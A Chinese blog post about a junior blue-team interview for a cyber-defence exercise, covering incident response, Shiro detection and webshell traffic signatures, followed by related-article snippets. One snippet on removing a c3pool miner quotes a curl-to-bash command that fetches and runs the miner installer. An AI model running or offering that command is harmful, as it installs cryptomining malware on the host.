HW面试经验分享 | 某服蓝队初级

前言

依稀记得是22年 7、8月份参加的HW,当时是比较炎热的时候,但又夹杂一丝秋意。也是头一次去离家乡比较远的地方,多少有点忐忑……(怕被噶腰子、水土不服、吃穿用住没着落等等),但最终也是平安无事且顺利的度过了那半个月的时间,现在回忆起来有点唏嘘了。

碎碎念

因为当时还是在校学生,没啥经验,所以也关注了几个公众号,然后投了投简历,随后就是与中间商取得了联系,然后面试了好几家厂商,其中也是比较曲折,但最终上了蓝初,因此写下此贴。

某服三面

第一面(视频面)

第一面比较简单,但是是视频面,这对于当时我第一次参加面试来说是很要命的(紧张的一批啊,导致我在面试的过程中,您和你掺杂着用)。不过还好,对方看起来是个在校女大学姐,背后有书架,看着像某校宿舍

面试官:emmm,你先来个自我介绍吧。

我:emmm,面试官您好,我叫xxxxxx,我是来自xxx大学的学生,我是xxx专业,大学主要学习的课程是web安全攻防、python编程基础、数据恢复与备份等(反正就是专业课,简单介绍了一些)。参加过一些CTF比赛,拿过某省赛一等奖,然后也挖到过一些高校漏洞(这里主要讲漏洞挖掘成果:某校园登录任意用户密码修改、某校论坛越权、某校SQL注入、某校文件上传等)。大概介绍个3分钟左右。

面试官:你是面的蓝初对吧。

我:是的。(我这边讲话,她那边酷酷用电脑记录。)

面试官:那你之前有接触过HW或者接触安全设备吗?

我:[我说我之前接触过某些厂商的设备,简单描述了一下功能和界面啥的,这里不做展开。]

面试官:知道OWASP TOP 10吗?

我:嗯,清楚的[当时查了下的资料,这个TOP10 是22年的]

  • 注入

  • SSRF

  • 安全日志记录和监控失败

  • 识别和认证失败

  • 不安全的设计

  • 失效的访问控制

  • 软件和数据完整性故障

  • 加密机制失效

  • 安全配置错误

  • 易受攻击的组件

面试官:会语言吗,都熟悉哪些语言?

我:python和php都学过一些,php的话可以写出基本的登录和注册验证,数据库连接这些,python的话会写一些安全脚本。

面试官:如果给你一个100分的渗透,你给自己打多少分?

我:[我的天,第一次面试就遇到这种打分题,当时直接脑子空白了。],我会给自己打个60分,因为我目前的水平来说,主要挖的逻辑漏洞比较多,然后是弱口令,SQL这些,内网方面还不是特别熟悉,然后也比较少getshell。

面试官:对病毒分析这一块有了解吗?

我:[因为当时学校有开设:应急响应的课,所以直接回答说有],有了解的,比如挖矿病毒,可以使用ps aux命令排查CPU使用情况,同时可以使用netstat -alpt查看是否有异常的网络通信,可以将异常的IP或者域名放到微步在线等威胁情报平台进行研判分析,以及可以排查是否有异常的进程,比如一些alksd这种乱的进程名,可以通过进程定位到相应的文件,然后对其进行下一步处理,也可以查看是否有异常文件,比如查看文件的修改时间和创建时间是否正常,文件名是否正常。然后也可以将病毒文件提取出来放到沙箱进行分析研判等等。[说了一堆,基本上将应急响应课上学习到的能记到的知识全部说出来了。]

面试官:说说你都用过哪些漏洞工具?

我:用过SQLMAP,burp suite,NMAP,AWVS,Nessus,MSF,cobalt strike,御剑,7KB等等[基本上将用过的想的起来的全说了。]

面试官:说说你对研判组的看法?

我:[懵了,彻底懵了,我不是面的蓝初吗?怎么问我研判?不过还好当时了解了一些研判的知识,随机应变了一下],研判组的话,在我看来主要是对监控组提交过来的内容进行研判分析,比如监控组那边从安全设备上提取了一个IP或域名并提交过来,那么研判组需要拿着这个ip或域名去分析是否为恶意IP或域名,比如通过微步在线等威胁情报平台去综合分析,然后得到研判结果后,将这个ip或者域名交给处置组去进行下一步的处理。

面试官:我看你有渗透的一个经理,能说说自己对于自己水平的评估吗?

我:[当时那个渗透其实主要是给学长打杂,因为比较菜~]emmm,我觉得我还有待继续学习吧。当时主要是跟着学校的学长去做任务的,然后我是主要做信息收集,通过fofa,指纹识别,以及nmap等收集目标的相关信息等等。

面试官:OK,我这边没有啥问题了,你这边看一下又什么问题需要问我的吗?

我:[我当时就很忐忑,第一次参加面试]面试完之后会有结果通知吗?

面试官:emmm,如果面试通过了,稍后会有人员给你打电话进行是技术面试的。

我:好的,那我这边没有别的问题了。

结束,面完了人已经麻了,因为末尾的时候她说这是一面,我当时天真以为就一面来着。

第二面(视频面)

很快啊,快到饭点的时候第二面的电话就打过来了,约到午休的时候13点多面试,依稀记得当时天气非常热,跑到学校的小树林里边椅子上坐着等待电话的“审判”,真正意义上的汗流浃背,结果视频的时候,对面还坐着俩人,一个看着很像大佬,一个年长一些可能是个领导,接下来可想而知,是两个人轮着问问题。

面试官:自我介绍一下

我:[依旧是我自己的自我介绍模板了,不再赘述]

面试官:说一说shiro的特征

我:返回包中的头部会包含rememberMe=deleteMe字段

面试官:说一说shiro的两个利用条件

我:[其实当时这个问题我只回答出了一个,并且楞了一会,然后说我后面会去查缺补漏的。]emmm,代码里面包含了编码的AES密钥

这里附上网上找的资料:https://juejin.cn/post/7133959651653058574#heading-5

面试官:如何看设备去分析攻击?

我:[其实这里就是在问如何分析误报以及看你有没有用过设备]emmm,可以通过设备告警,筛选出可疑攻击和数据包,然后对数据包进行复现,比如安全设备上报了个SQL注入,那就拿着数据包中的exp在得到授权的情况下去对SQL注入进行复现,如果注入成功,就说明这确实是攻击,并且需要上报,对相应的ip或域名作出处理,如果复现失败,那么可能是设备误报。

面试官:对于应急响应有没有了解?

我:[正好学了这门课,举了个例子]有的,给举了一个挖矿中病毒的例子,然后对相应的ip或域名进行封禁,做好主机隔离,进程查杀,文件清理等。

面试官:说一说冰蝎的特征?

我:[这里就附上一些常见的webshell连接工具的特征了,当时回答的不是特别全。]

 
  1. 常见WebShell客户端的流量特征

  2. 菜刀

  3. 菜刀 webshell 只使用了 url 编码 + base64 编码,shell 特征就是传输参数名为 z0,还存在int_set("display_erros","0")字符串特征

  4. 蚁剑

  5. 默认的蚁剑 shell,连接时会请求两次,其请求体只是经过 url 编码,其流量中也存在和蚁剑一样的代码

  6. 第一次请求,关闭报错和 magic_quotes,接下来去获取主机的信息

  7. 第二次请求,会把主机目录列出来

  8. 冰蝎2.0

  9. 使用 aes 加密发起三次请求

  10. 第一次请求服务端产生密钥写入 session,session 和当前会话绑定,不同的客户端的密钥也是不同的

  11. 第二次请求是为了获取 key,第三次使用 key 的 aes 加密进行通信

  12. 冰蝎3.0

  13. 使用 aes 加密发起两次请求

  14. 3.0 分析流量发现相比 2.0 少了动态密钥的获取的请求,不再使用随机生成 key,改为取连接密码的 md5 加密值的前 16 位作为密钥

  15. 一次请求为判断是否可以建立连接,少了俩次 get 获取冰蝎动态密钥的行为,第二次发送 phpinfo 等代码执行,获取网站的信息

  16. 哥斯拉

  17. 支持 n 种加密

  18. 采用了和冰蝎 3.0 一样的密钥交换方式,哥斯拉建立连接时会发起三次请求,第一次请求数据超级长,建立 session,第二三次请求确认连接

面试官:如果提前入场工作,你会对客户提哪些建议

我:我给客户的建议是,对于弱口令系统进行整改,修改为符合复杂度要求的密码;对一些存在漏洞或者比较老的中间件或者组件进行升级或加固;对于一些边缘资产或者废弃的资产,在不影响业务的情况下可以下架;关闭不必要的端口;给终端安装安全防护软件;在hw开始可以进行一次模拟渗透和安全基线核查;对人员开展网络安全教育培训。

面试官:你经历过社工吗?你会社工吗?

我:我没经历过社工,但是我知道社工的一些方法,这里就不展开了。

面试官:你对于钓鱼攻击有没有了解?

我:有了解的,钓鱼攻击是攻击者通过将恶意的链接或者木马等恶意软件伪装成正常的链接、邮件、文件或者软件发送给受害者,诱导受害者点击链接、安装软件或者导向网站,从而导致受害者主机失陷或者敏感信息如OA账号密码等信息泄露。比如,可以将木马伪装成安全防护软件,然后通过邮件的形式投放到目标,然后以重要时期为由升级安装安全防护软件,抓住人的心理,催促目标进行安装,然后进行下一步获取权限或者其他操作。

面试官:说说你觉得防范钓鱼攻击最重要的是什么?

我:我觉得还是人员的安全意识培训最重要,在重要时期需要着重对人员进行网络安全意识的培训,让他们不要去点击来历不明的邮件链接,有状况先向上级汇报和沟通,从人员这一层来杜绝钓鱼攻击。

后面就是反问环节了,因为对方主要是技术面,所以也没有其他要问的,然后就挂断了。

第三面(电话面)

第三面主要是因为内部对接出了点问题,导致我面了三次,第一次面试我就遇上了面三次,差点绷不住了。第三面也是问一些技术问题,知道最后我问还有面试吗才得知是搞错了,我多面了一次害。

最后

最后也是成功面过了,虽然薪资不高,但毕竟是第一次去参加,所以也是抱着长见识,长经验的心态去的,从到客户现场的头几天紧张的冒冷汗到后面10几天的淡然,也算是心理上的成长了。结束后也是在当地玩了一两天,到处瞎逛了下,然后就背上电脑和书包回家了~

 申明:本账号所分享内容仅用于网络安全技术讨论,切勿用于违法途径,所有渗透都需获取授权,违者后果自行承担,与本号及作者无关,请谨记守法。

免费领取安全学习资料包!


渗透工具

技术文档、书籍

面试题

帮助你在面试中脱颖而出

视频

基础到进阶

环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等

应急响应笔记

学习路线

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.rhkb.cn/news/309657.html

如若内容造成侵权/违法违规/事实不符,请联系长河编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

优化两个简单的嵌套循环

优化嵌套循环的方法通常取决于具体的情况,但有几种常见的技巧可以尝试。尽可能减少内部循环的迭代次数,这可以通过更有效的算法或数据结构来实现。如果内部循环中使用的值在外部循环中已经计算过,可以尝试在外部循环中计算并将结果存储起来&a…

zato,一个神奇的 Python 库!

大家好,今天为大家分享一个神奇的 Python 库 - zato。 Zato是一个高性能的Python企业服务总线(ESB)和应用集成框架,专为简化复杂系统间的通信和数据交换而设计。它提供了一个灵活、可扩展的平台,以支持各种集成需求,从简单的数据传…

DB schema表中使用全局变量及在DB组件中查询

DB schema表中使用全局变量及在DB组件中查询 规则如下: 使用如下: 如果在unicloud-db组件上不加判断条件,就会报错,并进入到登录页。 那么就会进入到登录页,加上了判断条件,有数据了就不会了。 因为在sc…

【信号处理】心电信号传统R波检测定位典型方法实现(matlab)

关于 心电信号中QRS波检测是一个非常重要的步骤,可以用于实现重要波群的基本定位,在定位基础上,可以进一步分析心电信号的特征变化,从而为医疗诊断提供必要的参考。 工具 MATLAB ECG心电信号 方法实现 ECG心电信号加载 ecg …

【基于HTML5的网页设计及应用】——事件代理.

🎃个人专栏: 🐬 算法设计与分析:算法设计与分析_IT闫的博客-CSDN博客 🐳Java基础:Java基础_IT闫的博客-CSDN博客 🐋c语言:c语言_IT闫的博客-CSDN博客 🐟MySQL&#xff1a…

华为OD机试 - 内存冷热标记(Java 2024 C卷 100分)

华为OD机试 2024C卷题库疯狂收录中,刷题点这里 专栏导读 本专栏收录于《华为OD机试(JAVA)真题(A卷B卷C卷)》。 刷的越多,抽中的概率越大,每一题都有详细的答题思路、详细的代码注释、样例测试…

2024最新 PyCharm 2024.1 更新亮点看这篇就够了

2024最新 PyCharm 2024.1 更新亮点看这篇就够了 文章目录 2024最新 PyCharm 2024.1 更新亮点看这篇就够了🚀 PyCharm 2024.1 发布:全面升级,助力高效编程!摘要引言 🚀 快速掌握 Hugging Face:模型与数据集文…

IOS手机耗电量测试

1. 耗电量原始测试方法 1.1 方法原理: 根据iPhone手机右上角的电池百分比变化来计算耗电量。 1.2实际操作: 在iOS通用设置中打开电池百分比数值显示,然后操作30分钟,60分钟,90分钟,看开始时和结束时电池…

经久耐用特氟龙材质塑料烧杯PFA坩埚耐受强酸强碱耐高温

PFA烧杯在实验过程中可作为储酸容器或涉及强酸强碱类实验的反应容器,用于盛放样品、试剂,可搭配电热板加热、蒸煮、赶酸用。 PFA烧杯规格参考:10ml、30ml、50ml、100ml、250ml、500ml、1000ml、2000ml。 外壁均有凸起刻度,直筒设…

CSS导读 (元素显示模式 上)

(大家好,今天我们将继续来学习CSS的相关知识,大家可以在评论区进行互动答疑哦~加油!💕) 目录 三、CSS的元素显示模式 3.1 什么是元素显示模式 3.2 块元素 3.3 行内元素 3.4 行内块元素 3.5 元素…

在Windows上安装Go编译器并配置Golang开发环境

文章目录 1、安装Go语言编译程序1.1、下载GoLang编译器1.2、安装GoLang编译器 2、配置Golang IDE运行环境2.1、配置GO编译器2.1.1、GOROOT 概述2.1.2、GOROOT 作用2.1.2、配置 GOROOT 2.2、配置GO依赖管理2.2.1、Module管理依赖2.2.2、GOPATH 管理依赖 2.3、运行GO程序2.3.1、创…

Spring Boot 学习(3)——Spring Initializr 创建项目问题解决

产生问题的原因,各种的版本都较老,所以导致出现问题。目前暂未打到合适的教程,按老教程学起来先。 小白瞎学,大神勿喷! 再次强调环境:maven 3.3.9、jdk 1.8、idea 2017、Spring 4.3.13、Spring Boot 1.5.…

L3 【哈工大_操作系统】操作系统启动

本节要点: 1、理解 OS 启动过程发生了什么,理解 OS 与 硬件 与 应用 之间的关系 2、本节讲解了 setup 模块 和 system 模块实现的功能 1、计算机上电时,操作系统在硬盘(磁盘)上,为了“取指执行”&#xff0…

CentOS7.9上安装Oracle11g

数据库安装目录/apps 一、环境准备 1、安装依赖 在线安装 [rootlocalhost ~]# yum install libnsl libnsl2-devel libaio-devel libcap-devel xorg-x11-utils xauth gcc make libstdc-devel sysstat smartmontools glibc-compat-2.17若服务器无法连接网络,可使用…

环形链表的约瑟夫问题(牛客网)

/*** 代码中的类名、方法名、参数名已经指定,请勿修改,直接返回方法规定的值即可** * param n int整型 * param m int整型 * return int整型*/struct ListNode * BuyNode(int n)//创建节点和成环{ struct ListNode *pheadNULL;struct ListNode *ptailN…

【安全】查杀linux上c3pool挖矿病毒xmrig

挖矿平台:猫池 病毒来源安装脚本 cat /root/c3pool/config.jsoncrontab -r cd /root/c3poolcurl -s -L http://download.c3pool.org/xmrig_setup/raw/master/setup_c3pool_miner.sh | LC_ALLen_US.UTF-8 bash -s 44SLpuV4U7gB6RNZMCweHxWug7b1YUir4jLr3RBaVX33Qxj…

有了一站式知识库服务平台,再也不用担心工作效率了!

你是否记得无数次在海量文件和邮件里搜索资料的烦恼?又或者是在急需某个信息时,却发现它埋藏在某个早已遗忘的文件夹深处?如果你的答案是肯定的,那么一站式知识库服务平台的出现,无疑是你提高工作效率的得力助手。 知识…

力扣面试150 反转字符串中的单词 API 双指针

Problem: 151. 反转字符串中的单词 &#x1f468;‍&#x1f3eb; 参考思路 &#x1f496; API 大法 时间复杂度: O ( n ) O(n) O(n) 空间复杂度: O ( n ) O(n) O(n) class Solution {public String reverseWords(String s){s s.trim();// 去除首尾空格List<String&…

软件无线电安全之HackRF One初探

HackRF介绍 HackRF是一款开源软件无线电&#xff08;SDR&#xff09;平台&#xff0c;由Great Scott Gadgets公司推出。它具有广泛的频率覆盖范围&#xff0c;从1 MHz到6 GHz&#xff0c;支持大部分常见的无线通信频段。采用软件定义无线电技术&#xff0c;HackRF提供了自定义…

CCleaner怎么清理软件缓存 CCleaner清理要勾选哪些 ccleanerfree下载

CCleaner软件是一款优秀的数据清理软件&#xff0c;其中没有硬盘和内存的设置&#xff0c;也不含任何广告软件&#xff0c;其出色的注册表清洁功能能够保证您的电脑更稳定运行。本文将围绕CCleaner怎么清理软件缓存&#xff0c;CCleaner清理要勾选哪些的相关内容进行介绍。 一、…